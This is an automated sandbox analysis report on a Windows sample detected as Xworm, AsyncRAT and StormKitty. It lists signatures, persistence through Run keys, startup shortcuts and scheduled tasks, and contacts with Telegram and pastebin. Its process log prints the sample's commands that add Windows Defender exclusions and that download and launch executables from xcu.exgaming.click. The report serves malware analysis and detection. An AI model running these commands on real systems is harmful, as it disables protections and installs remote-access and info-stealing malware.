Analysis Overview
SHA256
87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6
Threat Level: Known bad
The file 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe was found to be: Known bad.
Malicious Activity Summary
Detects executables using Telegram Chat Bot
AsyncRat
Detects Windows executables referencing non-Windows User-Agents
Contains code to disable Windows Defender
Xworm family
Detect Xworm Payload
StormKitty
StormKitty payload
Xworm
Detects executables attemping to enumerate video devices using WMI
Detects executables referencing credit card regular expressions
Detects Windows executables referencing non-Windows User-Agents
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.
Detects executables referencing Windows vault credential objects. Observed in infostealers
Async RAT payload
Detects executables containing artifacts associated with disabling Widnows Defender
Detects executables using Telegram Chat Bot
Detects executables embedding registry key / value combination indicative of disabling Windows Defender features
Reads user/profile data of web browsers
Checks computer location settings
Executes dropped EXE
Drops startup file
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Unsigned PE
Enumerates physical storage devices
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Suspicious behavior: AddClipboardFormatListener
Delays execution with timeout.exe
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-04-18 01:36
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects Windows executables referencing non-Windows User-Agents
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects executables using Telegram Chat Bot
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-18 01:36
Reported
2024-04-18 01:40
Platform
win10v2004-20240412-en
Max time kernel
152s
Max time network
165s
Command Line
Signatures
AsyncRat
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
StormKitty
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects Windows executables referencing non-Windows User-Agents
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects executables attemping to enumerate video devices using WMI
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables containing artifacts associated with disabling Widnows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects executables embedding registry key / value combination indicative of disabling Windows Defender features
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects executables referencing Windows vault credential objects. Observed in infostealers
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects executables referencing credit card regular expressions
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects executables using Telegram Chat Bot
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\xoxmpc.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\system.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Mise à jour carte CPS.lnk | C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Mise à jour carte CPS.lnk | C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xoxmpc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\system.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Mise à jour carte CPS = "C:\\Users\\Admin\\AppData\\Roaming\\Mise à jour carte CPS.exe" | C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\system.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe
"C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Mise à jour carte CPS.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Mise à jour carte CPS" /tr "C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe"
C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe
"C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe"
C:\Users\Admin\AppData\Local\Temp\xoxmpc.exe
"C:\Users\Admin\AppData\Local\Temp\xoxmpc.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1AD1.tmp.bat""
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
C:\Users\Admin\AppData\Roaming\system.exe
"C:\Users\Admin\AppData\Roaming\system.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe
"C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.33.209.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| FR | 86.68.222.14:7000 | tcp | |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.222.68.86.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.138.73.23.in-addr.arpa | udp |
| FR | 86.68.222.14:7000 | tcp | |
| FR | 86.68.222.14:7000 | tcp | |
| US | 8.8.8.8:53 | xcu.exgaming.click | udp |
| US | 8.8.8.8:53 | xcu5.exgaming.click | udp |
| US | 8.8.8.8:53 | xcu.exgaming.click | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | xcu5.exgaming.click | udp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.173.189.20.in-addr.arpa | udp |
Files
memory/4196-0-0x0000000000050000-0x0000000000080000-memory.dmp
memory/4196-1-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_phkrjhpb.yzv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1192-11-0x000002817BC20000-0x000002817BC42000-memory.dmp
memory/1192-12-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/1192-13-0x000002817A180000-0x000002817A190000-memory.dmp
memory/1192-14-0x000002817A180000-0x000002817A190000-memory.dmp
memory/4196-15-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/1192-16-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/1192-17-0x000002817A180000-0x000002817A190000-memory.dmp
memory/1192-18-0x000002817A180000-0x000002817A190000-memory.dmp
memory/1192-19-0x000002817A180000-0x000002817A190000-memory.dmp
memory/1192-22-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/3944-24-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/3944-31-0x000001E777590000-0x000001E7775A0000-memory.dmp
memory/3944-30-0x000001E777590000-0x000001E7775A0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
memory/3944-37-0x000001E777590000-0x000001E7775A0000-memory.dmp
memory/3944-38-0x000001E777590000-0x000001E7775A0000-memory.dmp
memory/3944-40-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/4160-50-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | adabeb4ab5727937b41a82146fefd87f |
| SHA1 | 61429310f8374b1b752d74572b8512d695979493 |
| SHA256 | 14d3b1cadf88259544cec7202902a061821b12fae3ebfaa76a03e646710eb485 |
| SHA512 | 057ac7df07610fa4d111642dc6dc08c391be7b38f5a35bac7bb6c8345983df4d0b5f4a09ff534f9cddc24577f920e3a14b2fece8e71489c5c52254eaf25cf9c8 |
memory/4160-51-0x0000013EA7700000-0x0000013EA7710000-memory.dmp
memory/4160-53-0x0000013EA7700000-0x0000013EA7710000-memory.dmp
memory/4160-55-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/5108-65-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a0847a1f912ef989f2b3497b28c41b46 |
| SHA1 | 265ddd27c8fc985ab891472b5ef208d636ccfd8b |
| SHA256 | 774edb0a31714fd00aed4c384fe9cf97f6d97b02bf70505355ada4e49b9db4fd |
| SHA512 | 414f11e4addd81f1ff9e4d64d464b5f027e7ef45ee470178569bf27b54e69e2f00c0e38d8843d3e312432d7f03546271812433c5e617f5b6820ff306303e1af5 |
memory/5108-66-0x000001661AF80000-0x000001661AF90000-memory.dmp
memory/5108-68-0x000001661AF80000-0x000001661AF90000-memory.dmp
memory/5108-69-0x000001661AF80000-0x000001661AF90000-memory.dmp
memory/5108-70-0x000001661AF80000-0x000001661AF90000-memory.dmp
memory/5108-72-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe
| MD5 | d0685487fa7e474e68a40a1b1ff49b60 |
| SHA1 | 069285708e07814d852bbd5f39a7ffbb3c9e2d94 |
| SHA256 | 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6 |
| SHA512 | eda00ba1453a33024fc05316196ccd71981ba61ababb965d1c3f01251f377047b00d8b6a9b140acf335cfa9d478bb3b6dbc4aca37fe74cfecb929e965ed190a8 |
memory/3132-79-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/3132-81-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/4196-83-0x000000001C4C0000-0x000000001C4CE000-memory.dmp
memory/4196-92-0x000000001E1E0000-0x000000001E300000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xoxmpc.exe
| MD5 | a7d63348cfe9b0dc9d3aaec28c76c8f0 |
| SHA1 | 1b993f554960286e90cfd7cedf4c457e1c46ff80 |
| SHA256 | 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54 |
| SHA512 | 3910836ccae023d562c66bfd754b0d1e3aadc4c1cbf57e96e8220c1de6534a529ec3630d595a7baba7c56ca503b6ce6d012b9c388b9f896f2a0a8be317ca5010 |
memory/4196-93-0x000000001B880000-0x000000001B88E000-memory.dmp
memory/1412-97-0x0000000000920000-0x0000000000938000-memory.dmp
memory/1412-98-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/1412-100-0x0000000002AB0000-0x0000000002AC0000-memory.dmp
memory/2200-101-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/2200-111-0x000001BF7EF40000-0x000001BF7EF50000-memory.dmp
memory/2200-118-0x000001BF7EF40000-0x000001BF7EF50000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6e722800abdc44fc1ce4688ca490118f |
| SHA1 | f64a4ff6d6e9b567151260fbaa543c345565de3b |
| SHA256 | e63cad15f591e7898953167aa4ff8960500a177ad1bfa5e30229793b8b0af7e4 |
| SHA512 | 5b4f0da0561a1cc5f36bad93b1f0d9ce225e86464a4d1a5dbefe5eac8e339420446c9300b1362992b06838a302a8172944557e2c202bf980f5a22b98b9bea13b |
memory/2200-153-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/1268-154-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/1268-156-0x00000169FDAF0000-0x00000169FDB00000-memory.dmp
memory/1268-155-0x00000169FDAF0000-0x00000169FDB00000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7825839543f6b3c710e1ab92dbe7f1ec |
| SHA1 | d43188bca6dd2038abf40282e497ee1d4c626f18 |
| SHA256 | 9fd6127316a4700789c6c0d93b62c3523e1245ae2d0180c91b0a4f39a80ccfd7 |
| SHA512 | aded824aec597a82736866bbbd44750f5b698b3408dfdb48979bd3d2638a1b4efd66ad00384bfc323275ff8f971cb85c80e00206201671f455c2870d9c27cb22 |
memory/1412-171-0x00007FF93F0B0000-0x00007FF93F2A5000-memory.dmp
memory/1412-172-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/1412-173-0x00007FF93F0B0000-0x00007FF93F2A5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp1AD1.tmp.bat
| MD5 | fa8827eed9b3556b8990d00b41feb7bb |
| SHA1 | 70210b96cbee4e10397b76651dd930a7a31340b7 |
| SHA256 | 25dce0cc5288582592573f454962e8b79894c325396d4c15430056a93be2dc8b |
| SHA512 | d814d246afefb5547c6c1df49c7361eecc8e24ec772e00bee1a6ae666332b0917ed03b0700f8362850d2c91f59d4e8411b3c472b9f735db45b67d4fa364c44c2 |
memory/1268-176-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/4964-177-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/4964-187-0x000001E27E360000-0x000001E27E370000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d8836c0315d56105d43f002e992524f7 |
| SHA1 | d1297b4a079838bac77840d677414c09710cca17 |
| SHA256 | 41385f2cb42b41f060b51e83de3c70ec8a7fd07700e44b7450c6a603578030e0 |
| SHA512 | 342ed7a766c2e38d331f7026ab62dd6711e2b1644bf60a4742a38a37db4c14d150d9f408c94ab93bd7254b23ea022dc05635e0e06ea3840514c3bac833f4b501 |
memory/4964-189-0x000001E27E360000-0x000001E27E370000-memory.dmp
memory/4964-190-0x000001E27E360000-0x000001E27E370000-memory.dmp
memory/4964-192-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/2436-196-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/2256-203-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | dd0e89eb06376648b6721ad5c3cd8f48 |
| SHA1 | 04ecbc9e78c27a0ff25eeea95f45bae1ae3cc70b |
| SHA256 | 49aefa0ad54df58c06757e99015e9be5db27ade38108da2e864f6485ef8e4fd2 |
| SHA512 | 4132dd1e80d81c40648cf0475858075d79234a86352579933bdc697ab2f2f2f6107a1a0397caef27563592307e564c8e62c09c3f14fca323b157748713011291 |
memory/2256-209-0x000001BC7FBC0000-0x000001BC7FBD0000-memory.dmp
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
| MD5 | cf759e4c5f14fe3eec41b87ed756cea8 |
| SHA1 | c27c796bb3c2fac929359563676f4ba1ffada1f5 |
| SHA256 | c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761 |
| SHA512 | c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b |
memory/2256-210-0x000001BC7FBC0000-0x000001BC7FBD0000-memory.dmp
memory/2256-207-0x000001BC7FBC0000-0x000001BC7FBD0000-memory.dmp
memory/2964-212-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/2964-213-0x000002A374C20000-0x000002A374C30000-memory.dmp
memory/2964-214-0x000002A374C20000-0x000002A374C30000-memory.dmp
memory/2256-225-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 83684a616885de4c1e9413ebd4a00bf4 |
| SHA1 | 3f97fd7910fa0de20c18c9d17f454595fade8eb0 |
| SHA256 | 5abc3dff344d8f19fbad3274354ace5ce41dca82abb1a85b6937883ce052b617 |
| SHA512 | da6107926221ac64fcb6392a9f0f6b9d09c18a89aadd5738d7613c59c25d9faad253fb7edb6e8eda4e2f5f08e07152ddbd067e6d7fae8fffb67f18b2dfa0dfae |
memory/2964-228-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/1784-229-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/1784-230-0x000001AC63D80000-0x000001AC63D90000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 48750759a6c508e64c9fa9a56f25fb68 |
| SHA1 | 2d885553d73940cc07d11c13c2fbc7d35a8ade91 |
| SHA256 | 06dbc75345d44373cf0657a2e2bea0dd957e921cc32e8350ca36b1efb0ef0368 |
| SHA512 | 39161378f31d95a016db63c332e69478aa51ad9cefa02472b5418f4680803f619ced4c638045fb54ffd0e3a5c95876e045c5a2fb50097b168f8be3f83dcba06b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a789e2ae2e0515279062eeaeba00deb0 |
| SHA1 | a2ce26255d067b3a01e7ac4b971173ac2369ed15 |
| SHA256 | 4acafdb79f135612dc23c8f158b094804bfe7f9c968c20dec74a36b217819d61 |
| SHA512 | be81d07c81fc89ec7bb8834dc9334e1fbe10acced0be0e49a8ec4af4bc476be2001782446ae466a46e86d670b1336b3f9b956a84cb45c255668b9462caaaf113 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Mise à jour carte CPS.exe.log
| MD5 | 2ff39f6c7249774be85fd60a8f9a245e |
| SHA1 | 684ff36b31aedc1e587c8496c02722c6698c1c4e |
| SHA256 | e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced |
| SHA512 | 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-18 01:36
Reported
2024-04-18 01:39
Platform
win7-20240221-en
Max time kernel
146s
Max time network
121s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Detects Windows executables referencing non-Windows User-Agents
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects executables using Telegram Chat Bot
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Mise à jour carte CPS.lnk | C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Mise à jour carte CPS.lnk | C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\Mise à jour carte CPS = "C:\\Users\\Admin\\AppData\\Roaming\\Mise à jour carte CPS.exe" | C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
